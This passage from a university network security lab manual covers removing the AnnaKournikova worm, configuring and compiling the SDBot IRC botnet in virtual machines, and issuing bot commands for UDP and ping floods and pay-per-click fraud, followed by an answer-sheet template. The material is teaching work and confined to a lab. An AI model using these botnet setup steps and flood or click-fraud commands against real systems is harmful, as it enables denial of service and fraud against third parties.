Now let us manually remove the AnnaKournikova worm by going to the “Removal” section on the website. Basically removal of the worm requires that we kill the running worm, remove copies of the AnnaKournikova.jpg.vbs file from the C:\WINDOWS directory we put it in, and removing the registry entry.
26
First, let us remove the registry entry. Click on the Start button and select Run. Then type regedit to open the registry editor. Now search for the term OnTheFly since that is where the worm made its registry entry. (You should remember this fact from viewing the source code and reading the information on the website.) The registry editor should find the OnTheFly folder just like in Figure 2.
Figure 2. Worm’s Registry Entry “OnTheFly”
Now let us delete this entry by right-clicking on the OnTheFly folder and selecting delete. The entry should be removed. Now let us remove the AnnaKournikova.jpg.vbs file from the C:\WINDOWS directory and the Desktop folder we created. Now reboot the WindowsXP virtual machine. The worm should be ineffective now. With this exercise, it is our hope that you learn how a real world worm can operate, where it can hide, and how to remove it by consulting sources.
27
Appendix G: SDBot (Excerpt from lab 10)
Section 2: SDBotThe first bot you will work with is SDBot, which is written in C and uses IRC to communicate with the bot master. It is neither the most powerful bot nor the most popular, but the setup is straightforward, and the version of the code we have has the self-replicating routines removed, so it is easier to control.
2.1 Installation and Configuration
Copy the SDBot folder from the NAS to your Windows XP virtual machine. Because SDBot is a C program, we have to install a windows C compiler. In the SDBot folder run the file lccwin32.exe to install the compiler. Click through the install process, leaving all of the default options in place.
Once LCC is installed, open the sdbot05b.c file in Wordpad and scroll down to the section labeled “bot configuration.” Make the following changes to the listed variables:
1. botid[] = “f00f00” botid[] = “bot1”2. password[] = “bar” password[] = “password”3. server[] = “irc.dal.net” server[] = “ircserver”4. port = 6667 port = 66685. channel[] = “#foobar” channel[] = “#ece4112”6. filename[] = “syscfg32-bot.exe” filename[] = “4112SDbot.exe”
This sets up the bot to connect to the IRC server we set up on the WS 4.0 host machine. Save the file as 4112bot.c and exit Wordpad.
Now, brows to C:\windows\system32\drivers\etc and edit the hosts file in Notepad to include the line:
<WS 4.0 IP> ircserver
Save the file.
Now run the make-lcc-4112.bat file to create a 4112bot.exe executable. This is the executable that you would need to get onto a victim machine and launch to make it part of your botnet. How to get the .exe onto a victim machine is beyond the scope of this lab, but recall techniques learned in previous labs.
28
Once the SDbot is installed, all firewall software will need to be disabled so that it won’t interfere with our experiments. Open the task manager, click the Processes tab, and end the blackice.exe and blackd.exe processes. This will need to be done after every reboot.
Also ensure that the windows firewall is disabled by navigating to the control panel and clicking on the Network Connections icon. Then right click the active connection icon, select Properties, click the Advanced tab, and ensure that the Windows firewall is turned off.
2.2 Meet Your Bot
Run the 4112bot.exe executable on the XP virtual machine. Go back onto your host machine and watch the X-Chat window. Within a few minutes a host with random letters for a username should log into your channel; this is your bot. Log into your bot by typing:
.login password (bot responds: password accepted)
In the X-Chat window now type:
.si
The bot should respond with some information about the system it is running on.
Screenshot #1: Take a screenshot of the X-Chat window showing successful login and system information printout.
Now type:
.repeat 6 .delay 1 .execute 1 winmine.exe
Q2.1. What is the result of this command?
The file sdbot_commandref.html is a list of commands that you can execute using SDBot. We’ll take a look at a few of them now.
2.3 UDP Flood
We will now use our bot to execute a UDP flood attack against your RedHat 7.2 machine (make sure to boot it up).
1. Open up ethereal on the host machine and filter the packets with these expressions: ((ip.src==<XP ip>) && (ip.dst==< RH7.2 ip>) && udp)
2. Click on the Capture tab and click on Options.
29
3. Check the "real time" and "automatic scrolling" under display options and start Capture.4. Use the command reference page to find the command for a UDP flood. Use the command to send 1000 4096 byte packets to port 23 RedHat 7.2 machine. Use a 1 ms delay.6. Wait until the bot displays "finished sending packets to < RH7.2 ip>".7. Stop Ethereal.8. Click on the Statistics tab on the Ethereal menu bar9. Click on “Summary”10. Check the Avg MBit/s traffic Displayed
Q2.2. What command did you use?
Q2.3. What happens if you don’t specify the port number to use for the UDP flood?
Q2.4. How many bots would be needed to flood a 1 Gbit link with UDP packets?
Q2.5: How might this attack be prevented from the perspective of the flood target? From the perspective of the infected victim?
2.4 Ping Flood
Now we’ll use the bot to execute a PING flood attack against the same target.
1. Open up ethereal and filter the packets with these expressions: ((ip.src==<XP ip>) && (ip.dst==< RH7.2 ip>) && icmp)
2. Click on the Capture tab and click on Options.3. Make sure "real time" and "automatic scrolling" under display options is checked and start Capture.4. Use the command reference to find the command for a PING flood. Use 1000 packets of size 4096, sent to the RedHat 7.2 machine. Use a 1 ms delay. 6. Wait until the bot displayed "finished sending packets to < WS4.0 ip>".7. Stop Ethereal.8. click on the Statistics tab on the ethereal9. Click on “Summary”10. Check the Avg MBit/s traffic Displayed
Q2.6. What command did you use?
Q2.7. How many bots would be needed to flood a 1 Gbit link with ICMP packets?
30
Q2.8. From the result of the two floods, which one is more efficient: UDP or ICMP flood?
Q2.9. Based on your answer to question 2.7, when would you not use the more efficient one?
2.5 Fraudulent Pay-per-click Count
Another use that botnets have been put to is to generate a fraudulent number of webpage referrals in pay-per-click advertising schemes. This is how it works: An advertising agency puts up a “banner” on an individual’s webpage, and pays the individual a nominal amount every time a visitor to the webpage clicks on the banner (which is a link to the sponsor’s website). Botnets can be used to generate large numbers of false “clicks” on these banners, thus fraudulently earning the individual a lot of money. This is how this is accomplished:
1. Open up ethereal and filter the packets with these expressions: ( ((ip.src==<WinXP IP>) && (ip.dst==57.35.6.10) && tcp) || (ip.src==57.35.6.10 && (ip.dst==< WinXP IP >) && tcp) )2. Click on the Capture tab and click on Options.3. Make sure "real time" and "automatic scrolling" under display options is checked and start Capture.4. SDbot command for fraudulent pay-per-click: .visit http://57.35.6.10/index.html http://<yourWebSite>.com6. Wait until the bot displayed “url visited.”7. Stop Ethereal.8. Now examine any tcp packet by right-clicking and selecting “Follow TCP stream.”
Screenshot #2: Take a screenshot of the tcp stream showing the source and referrer web page.
2.6 Bot Removal
Open up the Task Manager (Ctrl+Alt+Del) and you should see the bot running under the conspicuous process name 4112SDBot.exe; if you were trying to hide the bot, you would, of course, pick a much less obvious name. Use the Task Manager to kill the process and restart your virtual machine. Once it has rebooted open up Task Manager again. Your bot should still be running. This is one of the most powerful things about bots; once you infect a computer, it stays infected (unless the user gets smart and fully deletes it).
1. Use Task Manager to kill the process again.2. Open the file “sdbot05a.c”3. Search for the function “void uninstall (void)” and examine its code
31
From this, you should be able to tell what the names of SDBot’s registry entries are.
Q.2.10. Where are the registry entries? Why are the entries placed in these two locations?
4. Open the registry editor by clicking StartRun and typing in “regedit”.5. Delete the registry entries as described by the source code and restart the virtual machine.6. Verify that sdbot05a.exe and TEMP.exe no longer show up as processes in Windows Task Manager.
Q.2.11. How would a user know where in their registry the bot is located if the source code were not available for inspection?
32
Sources:General information: http://en.wikipedia.org/wiki/Sandbox_(computer_security) www.wilderssecurity.com/Sandboxie: www.sandboxie.comShadowSurfer: www.storagecraft.com/products/ShadowSurfer/ Virtual Sandbox: www.fortresgrand.com/products/vsb/vsb.htmJPEGofDeath exploit test: http://www.guidoz.com/exploit-test.exe
33
ECE 4112 Internetwork Security
Lab X: Sandboxing
Group Number: _________Member Names: ___________________ _______________________
Section 1: Installing the Sandboxes and testing
Q1.1: What did you notice about each sandbox after the restart?
Q1.2: Do you see the file on your desktop?
Screenshot #1-3: Take a screenshot in each VM with the IE window with the copied file name highlighted and the file on the desktop in the same screenshot.
Q1.3: For each VM, do you see the file on your desktop?
Q1.4: Upon bootup, for each of the computers, is the FTP’d file still there?
Q1.5: What happens with each of the three sandboxes when you try to close the sandbox?
34
Q1.6: Upon bootup, for each of the computers, is the text file still there?
Section 2: Susceptibility to Remote Attacks and Local Attacks
Q2.1: Since a sandbox is supposed to mimic and actual host, should it allow crashes if the host crashes?
Q2.2: For each of the VMs, did you crash?
Q2.3: For each of the VMs, did you crash?
Section 3: Susceptibility to Rootkits, Backdoors, Worms, Botnets
Q3.8: For each of the VMs, did all of them load the worm correctly? Why or why not?
35
Screenshot #4-6: Take a screenshot showing this registry entry
Q3.9: Is this registry key there? Why or why not?
Q3.10: Did SDBot load up successfully on each VM? If not, why?
Section 4: Clearing the Sandbox
Q4.1: After the restart, did you notice any of the programs we used in section 3 load up? If so, what programs are active?
Screenshot # 7-9: Take a screenshot of the OnTheFly registry key, or where it would be
Q4.2: What sandbox do you prefer? Why?
36
General Questions
How long did it take you to complete this lab? Was it an appropriate length lab?
Suggested Additions and Future Enhancements
What corrections and or improvements do you suggest for this lab? Please be very specific and if you add new material give the exact wording and instructions you would give to future students in the new lab handout. You may cross out and edit the text of the lab on previous pages to make minor corrections/suggestions. General suggestions like add tool xyz to do more capable scanning will not be awarded extras points even if the statement is totally true. Specific text that could be cut and pasted into this lab, completed exercises, and completed solutions may be awarded additional credit. Thus if tool xyx adds a capability or additional or better learning experience for future students here is what you need to do. You should add that tool to the lab by writing new detailed lab instructions on where to get the tool, how to install it, how to run it, what exactly to do with it in our lab, example outputs, etc. You must prove with what you turn in that you actually did the lab improvement yourself. Screen shots and output hardcopy are a good way to demonstrate that you actually completed your suggested enhancements. The lab addition section must start with the title “Lab Addition”, your addition subject title, and must start with a paragraph explaining at a high level what new concept may be learned by adding this to the existing laboratory assignment. After this introductory paragraph, add the details of your lab addition. Include the lab addition cover sheet from the class web site.
Turn-in ChecklistAnswer Sheet with answers.9 Screenshots Any additions for the lab.
37
